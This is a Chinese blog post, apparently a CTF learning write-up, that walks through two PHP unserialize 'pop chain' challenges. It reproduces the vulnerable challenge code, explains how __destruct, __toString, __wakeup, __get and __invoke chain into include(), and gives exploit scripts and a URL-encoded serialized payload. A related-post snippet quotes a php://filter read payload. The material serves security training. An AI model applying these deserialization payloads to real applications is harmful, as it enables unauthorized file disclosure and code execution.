pop学习之入门题二:

最新推荐文章于 2025-08-20 15:27:05 发布
原创 最新推荐文章于 2025-08-20 15:27:05 发布 · 955 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #安全 #网络安全

文章讲述了在PHP代码中发现的两个漏洞利用案例,涉及pop链攻击技术,即通过构造特定序列调用链触发恶意代码执行,如包含flag.php文件。作者详细解释了如何利用类的继承和方法调用顺序实现攻击并给出了实际的构造示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

时间不会永远只停留在过去的,你也不能永远活在那一刻。

[SWPUCTF 2021 新生赛]pop

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

 分析:

1.首先找到漏洞函数include(),包含了flag.php,条件是admin=w44m,passwd=08067,include函数又在Getflag()方法里。

2.要触发Getflag(),我们找到了w33m类里的__toString方法,里面用w00m参数执行了w22m参数。我们可以把w00m参数变成w44m的对象,w22m变成Getflag方法。

3.要触发__toString方法,我们要把所在类w33m的对象当做字符串使用,我们找到了w22m类的__destruct方法里面echo输出了属性w00m,我们可以把w00m变为w33m类的对象的。

4.而__destruct方法是在对象被销毁时自动触发的。所以我们可以构造pop链:

__destruct()->toString()->Getflag()

构造: 

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'w44m';
    protected $passwd = '08067';


}

class w22m{
    public $w00m;

}

class w33m{
    public $w00m;
    public $w22m;

}

$a=new w44m();
$b=new w22m();
$c=new w33m();
$b->w00m=$c;
$c->w00m=$a;
$c->w22m='Getflag';
echo urlencode(serialize($b));
?>

[NISACTF 2022]popchains 

<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

 分析:

1.找到漏洞函数include($value),在类Try_Work_Hard的append方法里, 要触发append方法,我们找到了__invoke方法里的$this->append()触发了append。而参数是var属性,所一我们需要让属性car=flag.php.

2.要触发__invoke()方法,就要让所在类的对象被当作方法使用。我们找到了Make_a_Change类中的__get方法列把属性effort当作方法去执行。所以我们可以把属性$effort等于Try_Word_Hard类的属性。

3.要触发__get方法,就要让所在类Make_a_Change的对象访问一个不存在或不可访问的属性。

我们找到了Road_is_Long里的__toString方法,返回了一个string属性去访问page属性,我们可以使string成为类Make_a_Change的对象,page是类Make_a_Change不存在的属性。

4.要触发__toString方法,就要让所在类Road_is_Long的对象被当作字符串使用。我们找到了__wakeup方法里的preg_match使page作为一个字符串来过滤。。

5.触发__wakeup方法,在所在类Road_is_Long的对象被反序列化时自动触发。

这样我们就可以构造pop链了:

__wakeup()->__toSting()->__get()->__invoke()->append()

构造: 

<?php

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var="flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;


    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
$a=new Road_is_Long();
$d=new Road_is_Long();
$b=new Try_Work_Hard();
$c=new Make_a_Change();

$a->page=$d;
$c->effort=$b;
$d->string=$c;
echo urlencode(serialize($a));
?>

O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A9%3A%22index.php%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D

注意: 

定义了两个Road_is_Long的对象$a和$d,将$a的属性page设置为$d,在执行到如下代码时

if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page))

会将page当作字符串处理,而此时page已经被设置为$d,也是在此触发__toString(),将$d的string属性设置为Make_a_Change的对象Make_a_ChangeObject,此时去访问Make_a_ChangeObject的page属性,page属性不存在,触发__get(),再将Make_a_ChangeObject的effort设置为Try_Work_Hard的对象Try_Work_HardObject,Try_Work_Hard的var因为是protected,所以在类中设置默认值为 /flag

AZ_aa
关注
[NISACTF 2022]popchains - 反序列化+伪协议
oZuoShen123的博客
10-07 1647
链条:Road_is_Long(construct->wakeup【page=$r】-> toString【string=$m】)-> Make_a_Change(construct->get【effort=$t】)-> Try_Work_Hard(invoke->append【var='php://filter/read=convert.base64-encode/resource=/flag'】)
Leetcode快速入门之开宗明义: 掌握概念和学习语法
herosunly的博客
06-09 1万+
1. 为什么要学习基本概念 2. 学习编程语法 2.1 为什么要学习C++和Java 2.2 C++基本语法 2.2.1 程序基本结构 2.2.2 静态数组 2.2.3 动态数组vector 2.2.4 字符串string 2.2.5 结构体struct 2.2.6 链表ListNode 2.2.7 哈希表unordered_map 2.2.8 集合unordered_set 2.2.9 队列queue 2.2.10 栈stack 2.2.11 优先队列 2.2.12 其他常用API 2.2.13 C++常
2021玄盾杯
简单安全
03-27 873
正常来讲直接code=getFLag();其实得到的16进制再取反就是getFlag字符串。
php反序列化
n1ght的博客
11-30 889
php反序列化,和php的session反序列化,php原生类
[SWPUCTF 2021 新生赛]pop(NSSCTF)
m0_70819573的博客
03-03 388
phppop链的原理是构造不同类相互调用的链条,调用php的魔术方法来实现flag的读取。1.打开环境,审计代码。
序列化和反序列化(
2301_81841047的博客
12-24 906
为了方便查找和记录,所以将实操和知识点分开,这篇文章就是由浅入深的介绍反序列化的相关目。
数据结构入门要点:算法学习的重点关注
AI天才研究院
05-06 995
本文旨在为计算机科学入门者构建数据结构的系统化认知框架,明确算法学习的核心关注领域。通过剖析数据结构的基础概念、实现原理、复杂度分析方法及实战应用,帮助读者建立从问建模到高效代码实现的完整思维链路。内容覆盖线性数据结构(数组、链表、栈、队列)和基础非线性结构(树、图),重点讲解时间复杂度(Time Complexity)与空间复杂度(Space Complexity)的分析方法,结合Python代码实现关键数据结构的核心操作。基础概念体系:定义数据结构与算法,建立核心术语表复杂度分析。
python入门-leetcode面试解之第226翻转叉树.zip
05-31
这个压缩包中的“python入门_leetcode面试解之第226翻转叉树”文件可能包含了详细的解思路、代码实现以及可能的测试用例,帮助学习者更全面地掌握这个问。通过深入学习和实践,不仅可以提升Python编程技巧...
python入门基础学习之数据容器:dict(字典、映射)
weixin_44996886的博客
09-11 436
python之dict(字典、映射)
Java算法从入门到精通:面试解析与演进路径
!... # 摘要 本文全面探讨了Java算法的基础知识、面试解析、实践应用、面试准备技巧以及进阶发展...首先对Java算法的核心概念进行了概述,接着解析了不同难度级别的算法面试,涵盖了数据结构操作、搜索排序、动态规
[NewStarCTF 2023] web
热门推荐
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开目,发现是小游戏(目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开目,提示我们传参两个数,然后帮我们计算。
pop链例
zhhhb1005的博客
05-01 967
目录 例 流程 exp pop链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 例 Happy New Year~ MAKE A WISH <?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'...
iscc-2022
zhhhb1005的博客
06-05 1170
分析目,info被强制转换成为数组,get传参 information ,同时要满足step1和step2才能得到flag。step1要求year=2022step2要求item为三个值的数组,第一个值为数组payload pop2022 看开头意思是如果使用get的wish传参那么就反序列化这个wish,如果不是则显示源代码。 流程 exp payload: get传参,然后将结果base64解密。 访问/ypHeMPardErE.zip ,得到源码 这⾥之前可以判断
由MRCTF学习php反序列化--pop链的构造
unexpectedthing的博客
09-09 822
文章目录前言魔法函数__toString()__invoke()__call()和__callStatic()pop链一个简单的例子MRCTF-ezpop 前言 复现地址:BUUCTF平台 目:MRCTF-ezpop 魔法函数 __construct():具有构造函数的类在创建新对象时,回调用此方法 __destruct():在对象所有引用都被删除或者对象被销毁时执行 __wakeup():使用unserialize()函数时调用 __sleep():使用serialize()函数时调用 __toStri
php反序列化之pop链构造
m0_62422842的博客
04-06 8290
前言 随着对反序列化学习的不断深入,我们来学习一下pop链的构造。这个pop链对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop链的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop链构造 一般的反序列化目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop链,从而达到
PHP之序列化与反序列化(POP链篇)
errorr0
03-11 6423
序列化与反序列化的进阶
MRCTF部分的总结与复现
qwzf
04-10 1万+
0x00 前言 目整体来说不太难,毕竟是个新生赛。但考察的知识点等方面,确实需要总结一下。于是我总结了部分MISC、Crypto和Web。
BUUCTF(7)
遇事不决冲冲冲
03-14 2908
[MRCTF2020]PYWebsite 1 [MRCTF2020]Ezpop 1 [SUCTF 2019]Pythonginx 1 [NPUCTF2020]ReadlezPHP 1 [CISCN2019 华东南赛区]Web11 1 [BSidesCF 2019]Futurella 1 [BJDCTF2020]EasySearch 1 [GYCTF2020]FlaskApp 1
数据湖学习
最新发布
sun657053178的博客
08-20 995
精通数据湖 = 架构原理 + 格式机制 + 引擎集成 + 元数据管理 + 实战经验。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值